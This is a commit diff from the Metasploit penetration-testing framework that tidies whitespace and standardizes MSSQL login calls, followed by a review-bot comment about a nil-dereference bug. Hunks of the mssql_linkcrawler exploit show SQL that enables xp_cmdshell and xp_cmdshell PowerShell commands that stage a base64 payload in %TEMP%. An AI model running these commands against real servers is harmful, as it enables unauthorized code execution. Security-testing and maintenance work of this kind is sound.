cleanup
zgoldman-r7 committed Jan 24, 2024
1 parent 2ba4924 commit 3cfd069
Showing 6 changed files with 10 additions and 12 deletions.
2 changes: 1 addition & 1 deletion lib/metasploit/framework/tcp/client.rb
Expand Up @@ -73,6 +73,7 @@ module Client
# @see Rex::Socket::Tcp
# @see Rex::Socket::Tcp.create
def connect(global = true, opts={})

dossl = false
if(opts.has_key?('SSL'))
dossl = opts['SSL']
Expand All @@ -97,7 +98,6 @@ def connect(global = true, opts={})
# enable evasions on this socket
set_tcp_evasions(nsock)


# Set this socket to the global socket as necessary
self.sock = nsock if (global)

2 changes: 1 addition & 1 deletion lib/msf/core/module/alert.rb
Expand Up @@ -202,7 +202,7 @@ def add_alert(level, msg, &block)
def alert_user
self.you_have_been_warned ||= {}

errors.each do |msg|
errors.each do |msg|
if msg && !self.you_have_been_warned[msg.hash]
print_error(msg)
self.you_have_been_warned[msg.hash] = true
2 changes: 1 addition & 1 deletion lib/rex/proto/mssql/client.rb
Expand Up @@ -66,9 +66,9 @@ def initialize(framework_module, framework, rhost, rport = 1433)
#
def mssql_login(user='sa', pass='', db='', domain_name='')
disconnect if self.sock

connect
mssql_prelogin

if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
idx = 0
pkt = ''
1 change: 0 additions & 1 deletion modules/auxiliary/admin/mssql/mssql_enum.rb
Expand Up @@ -19,7 +19,6 @@ module to work, valid administrative user credentials must be
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE
))

end

def run
1 change: 0 additions & 1 deletion modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
Expand Up @@ -342,7 +342,6 @@ def sql_statement()

# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
begin
#here
result = mssql_query(sql, false) if mssql_login_datastore

column_data = result[:rows]
14 changes: 7 additions & 7 deletions modules/exploits/windows/mssql/mssql_linkcrawler.rb
Expand Up @@ -78,7 +78,7 @@ def exploit
# Check if credentials are correct
print_status("Attempting to connect to SQL Server at #{datastore['RHOST']}:#{datastore['RPORT']}...")

if !mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
if !mssql_login_datastore
print_error("Invalid SQL Server credentials")
print_status("-------------------------------------------------")
return
Expand Down Expand Up @@ -408,20 +408,20 @@ def enable_xp_cmdshell(path,name,shelled)
# Enabling show advanced options and xp_cmdshell
execute = "sp_configure 'show advanced options',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
end

# Enabling xp_cmdshell
print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
execute = "sp_configure 'xp_cmdshell',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
end

# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_login_datastore
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdNow = result[:rows].pop.pop

if xpcmdNow == 1 or xpcmdOrig == 1
Expand Down Expand Up @@ -510,19 +510,19 @@ def powershell_upload_exec(path)
mytext_64.scan(/.{1,2500}/).each {|part|
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore
linenum = linenum+1
}

# Remove duplicate lines from temp file and write to new file
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore

# Remove tracking tags from lines
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login(datastore['USERNAME'], datastore['PASSWORD'])
result = mssql_query(sql, false) if mssql_login_datastore

# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
# If running on 64bit system, 32bit powershell called from syswow64
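Review bot: `xpcmdNow = result[:rows].pop.pop` in the enable_xp_cmdshell hunk dereferences `result` unconditionally, but the line just above it only assigns `result` when `mssql_login_datastore` succeeds, so a failed login either raises NoMethodError on nil or reuses whatever `result` still holds from the two sp_configure queries earlier in the same method and reports a stale xp_cmdshell state. The login failure should be handled before the verification query is sent rather than skipped, e.g. `unless mssql_login_datastore` / `print_error("Could not log in to #{name} to verify xp_cmdshell state"); return` / `end`, followed by an unguarded `result = mssql_query(sql, false)` (the value to return on failure depends on how callers treat this method, which lies outside the hunk). The three `result = mssql_query(sql, false) if mssql_login_datastore` lines in the powershell_upload_exec hunk have the same shape; `result` is not read within the visible lines there, so a login failure appears to drop the query silently instead of crashing, which may still be worth reporting with print_error. Both enclosing methods begin before their hunks and continue past them.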
